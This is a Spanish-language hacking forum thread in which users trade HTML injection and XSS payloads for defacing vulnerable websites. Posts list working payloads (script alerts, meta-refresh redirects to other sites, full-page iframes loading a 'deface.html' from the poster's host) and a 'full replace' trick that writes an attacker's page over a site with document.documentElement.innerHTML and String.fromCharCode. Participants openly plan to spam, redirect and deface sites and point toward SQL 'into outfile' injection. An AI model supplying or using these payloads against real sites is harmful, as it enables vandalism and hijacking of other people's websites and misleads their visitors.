Sobre las diferentes HTMLi

Iniciado por C1n0X, Agosto 22, 2010, 09:35:22 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 22, 2010, 09:35:22 PM Ultima modificación: Noviembre 23, 2014, 02:28:12 PM por Expermicid
Bueno, tengo una idea que se me pasa por la cabeza, pero hay un problema xD no se cuántos códigos ni cuales son los de las htmli, osea conozco 3 pero sólo me sé 2...

1.- Alerta: <script>alert('Contenido alerta')</script>
2.- Redirección: <META HTTP-EQUIV="refresh" CONTENT="segundos; url=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta">
3.- Este no se como se llama pero era algo de document no se qué que cuando lo pones, sale la web en blanco y lo que tu le hayas puesto es lo que sale en la web xD

Necesito:
Todos los que sepáis y sus códigos correspondientes

Gracias de antemano.

No se si te serviran, pero te dejo algunos interesantes

No dejar seleccionar texto

Código: php
<script language="Javascript">
<!-- Begin
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
// End -->
</script>


Abrir link en una nueva ventana

Código: php
<a href="http://www.CheNico.com" target="_blank">Pauluk Computación</a>


Abrir una ventana con una imagen, podes manejar las medidas cambiando "Width" y "Height"

Código: php
<a name="1"></a><A
onclick="window.open('MiFoto.jpg','Estructuras','toolbar=no,location=no,scrollbars=yes,directories=
no,status=no,menubar=no,resizable=no,width=400,height=475');"
href="#1"><b><font face="Verdana" size="2">Ejemplo</font></b></a>


Hacer un IFrame

Código: php
<IFRAME src="http://mihost/deface.html" width="2000" height="1900" scrolling="auto" frameborder="0">


Código: php
<IFRAME src="http://mihost/deface.jpg" width="2000" height="1900" scrolling="auto" frameborder="0"> 


Saludos compañero ;)

Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...

Si, lo se. Todo depende de tu imaginacion, yo les puedo ddar mucho uso.

Puedo ir gastando la web de a poco, primero no dejo seleccionar texto, luego la lleno de SPAM y luego la redirecciono.

No me refiero a que lo valla a hacer, pero es lo que se me ocurre :)

No se que uso le ves a poner lo de Abrir link en una ventana nueva xD

C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

Exacto, y ademas, abrir una ventana serviria como SPAM :)

Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.

Exacto, y ademas, abrir una ventana serviria como SPAM :)

Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P

No se que mierda sera poner un outfile pero con html injection se pueden hacer cosas asi No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No se que mas podria ser, en todo caso es lo que hay, ya no quedan muchas webs que dejen pasar un error tan miserable! en algunos foros tambien se da que los admins activan en uso de HTML para que, por ejemplo, sea mas facil postear videos o weas por el estilo Ej: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Deberias mirarte lo que es un into out file, y más cuando estes en un panel que deje pasar html, o también se puede inyectar desde una SQL, miratelo mind.

Pero a ver, yo no quiero que me digáis nada de eso xDDDDDD a ver... yo quiero que me digáis codes para hacer cosas como estos que ya tengo:

- <script>alert('Contenido')</script>
- <META HTTP-EQUIV="refresh" CONTENT="0.00000001; url=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta">
- <h1>Texto</h1>
- <marquee>Texto</marquee>
- <IFRAME src="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" width="100000" height="100000" scrolling="auto" frameborder="0">
- <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br><br><br><br><h3>Texto 3</h3>";</script> ó <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br>";</script>

Me decís más? :$

Agosto 23, 2010, 06:46:55 PM #10 Ultima modificación: Agosto 23, 2010, 06:50:04 PM por SkillmaX
Código: php
<head><title>BUG</title></head><body bgcolor="black"><table border="1" bordercolor="green"  width="800" height="300"></tr><td height="20"><font size="15" color="red" align="center">XSS & HTML</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Unexploited</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Narrow your vars</font></td></tr></table></body>Corrige los fallos.<br>



Lo cogí de xtemp.

Ese no hace mucha gracia ponerlo xd bueno ya veréis la dinámica y me diréis más ê.ê luego veréis jejejejejeje

c1n0x modificalo a tu gusto y todo solucionado.

Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P

1º estás reviviendo un post de agosto del 2010.
2º no se que ganas tienen de ponerle nombre a códigos de javascript, nunca lo entendí, para mi siguen siendo cosas que puedes hacer con js, por lo que no puedo entender por que le llaman HTMLi y le ponen nombre a cada inyección.

habría que cerrar el post por revivir xD.

saludos!